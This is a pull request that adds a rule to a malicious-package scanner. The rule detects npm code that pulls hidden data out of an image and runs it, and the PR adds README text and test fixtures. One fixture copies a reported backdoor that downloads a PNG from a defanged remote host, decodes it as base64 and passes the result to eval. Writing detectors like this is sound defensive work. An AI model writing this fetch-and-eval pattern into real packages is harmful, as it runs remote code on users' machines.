### PR TITLE
Add steganography for NPM

### DIFF
--- a/README.md
+++ b/README.md
@@ -126,8 +126,9 @@ Source code heuristics:
 | shady-links | Identify when a package contains an URL to a domain with a suspicious extension |
 | npm-exec-base64 | Identify when a package dynamically executes code through 'eval' |
 | npm-install-script | Identify when a package has a pre or post-install script automatically running commands |
+| npm-steganography | Identify when a package retrieves hidden data from an image and executes it |
 | bidirectional-characters | Identify when a package contains bidirectional characters, which can be used to display source code differently than its actual execution. See more at https://trojansource.codes/ |
-| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious dll |
+| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL |
 | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system |
 
 Metadata heuristics:

--- a/guarddog/analyzer/sourcecode/npm-steganography.yml
+++ b/guarddog/analyzer/sourcecode/npm-steganography.yml
@@ -14,10 +14,12 @@ rules:
           - pattern-inside: |
               Buffer.from
               ...
+          - pattern-inside: |
+              steggy.reveal
+              ...
 
         - pattern-either:
           - pattern: eval(...)
-
           
     pattern-sources:
       - patterns:

--- a/guarddog/analyzer/sourcecode/npm-steganography.yml
+++ b/guarddog/analyzer/sourcecode/npm-steganography.yml
@@ -1,0 +1,32 @@
+rules:
+  - id: npm-steganography
+    languages:
+      - javascript
+    message: This package is dynamically executing hidden data from an image
+    metadata:
+      description: Identify when a package retrieves hidden data from an image and executes it
+    mode: taint
+    pattern-sinks:
+      - patterns:
+
+        # must obtain the payload data
+        - pattern-either:
+          - pattern-inside: |
+              Buffer.from
+              ...
+
+        - pattern-either:
+          - pattern: eval(...)
+
+          
+    pattern-sources:
+      - patterns:
+          - pattern-inside: |  
+              "$IMG"
+              ...
+          - metavariable-regex:
+              metavariable: $IMG
+              regex: (?i).*?\.(jpeg|jpg|png|gif|bmp|tiff|webp|ico|psd|svg|ai|eps|raf|cr2|nef|arw|orf|dng|indd|xcf)
+          
+    severity: WARNING
+

--- a/tests/analyzer/sourcecode/npm-steganography.js
+++ b/tests/analyzer/sourcecode/npm-steganography.js
@@ -1,3 +1,4 @@
+// ref: https://www.sonatype.com/blog/cors-parser-npm-package-hides-cross-platform-backdoor-in-png-files
 function f() {
   const t = "base64",
       c = "utf8",

--- a/tests/analyzer/sourcecode/npm-steganography.js
+++ b/tests/analyzer/sourcecode/npm-steganography.js
@@ -1,0 +1,20 @@
+function f() {
+  const t = "base64",
+      c = "utf8",
+      ht = require("https"),
+      cors = () => {
+          const request = ht["get"]("hxxps://api.jz-aws[.]info/initial.png", 
+          function(response) {
+              let data = "";
+              response.on(data, r => {
+                  data += r
+              });
+              response.on(data, (() => {
+                  let plain = Buffer.from(data, t).toString();
+                  // ruleid: npm-steganography
+                  eval(plain)
+              }));
+          });
+      };
+  module.exports = cors;
+}

--- a/tests/analyzer/sourcecode/npm-steganography.js
+++ b/tests/analyzer/sourcecode/npm-steganography.js
@@ -19,3 +19,15 @@ function f() {
       };
   module.exports = cors;
 }
+
+
+function f() {
+    const fs = require('fs')
+    const steggy = require('steggy')
+
+    const image = fs.readFileSync('./path/to/image.png')
+    // Returns a string if encoding is provided, otherwise a buffer
+    const revealed = steggy.reveal()(image)
+    // ruleid: npm-steganography
+    eval(revealed.toString())
+}


### PR DESCRIPTION
Adds new rule that detects when package retrieves hidden data from an image and executes it.
This detection was already present for PyPI ecosystem and was introduced for NPM.

A false positive analysis scan was performed with the following results:

A false positive analysis scan was performed with the following results:
- A test was ran against the top 2k npm packages, which produced **0 FP**
- A test was ran against the most interesting npm packages released last week **(~89)**, which produced **0 FP**
